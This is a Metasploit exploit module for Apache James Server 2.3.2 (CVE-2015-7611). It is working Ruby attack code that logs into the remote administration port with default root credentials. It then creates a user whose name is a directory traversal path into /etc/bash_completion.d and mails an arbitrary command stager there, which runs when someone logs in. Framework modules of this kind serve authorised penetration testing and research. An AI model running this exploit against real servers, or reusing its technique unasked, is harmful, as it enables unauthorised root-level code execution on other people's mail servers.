##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Command Injection",
      'Description'    => %q{
        To use this module, start a listener using the given payload, host, and port before running the exploit. After running the exploit, the payload will be executed when a user logs into the system. This module exploits a vulnerability that exists due to a lack of input validation when creating a user. Messages for a given user are stored in a directory partially defined by the username. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. For this exploit, bash completion must be enabled to gain code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Matthew Aberegg', 'Michael Burkey' ],
      'References'     =>
        [
          [ 'CVE', '2015-7611'],
          [ 'EDB', '35513'],
          [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf']
        ],
      'Platform'       => 'linux',
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'        =>
      [
        [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
        [ 'Linux x64',       { 'Arch' => ARCH_X64 } ]
      ],
      'Privileged'     => true,
      'DisclosureDate' => "Oct 1 2015",
      'DefaultTarget'  => 0,
      'CmdStagerFlavor'=> [ 'printf' ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => 'true'
        }
      ))
      register_options(
        [
          OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
          OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ])
        ])
      deregister_options('SRVHOST', 'SRVPORT')
  end

  def check
    connect
    banner = sock.get
    if banner.include? "(JAMES SMTP Server 2.3.2)"
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Unknown
    end
    disconnect
  end

  def execute_command(cmd, opts = {})
    username = datastore['USERNAME']
    password = datastore['PASSWORD']

    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })

    sock.get

    sock.puts(username + "\n")
    sock.get

    sock.puts(password + "\n")
    sock.get

    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
    sock.get

    sock.puts("quit\n")
    disconnect

    connect

    sock.puts("ehlo admin@apache.com\r\n")
    sock.get

    sock.puts("mail from: <'@apache.com>\r\n")
    sock.get

    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
    sock.get

    sock.puts("data\r\n")
    sock.get

    sock.puts("From: admin@apache.com\r\n")
    sock.puts("\r\n")
    sock.puts("'\n")
    sock.puts("#{cmd}\n")
    sock.puts("\r\n.\r\n")
    sock.get

    sock.puts("quit\r\n")
    sock.get

    disconnect
  end

  def exploit
    execute_cmdstager
  end

end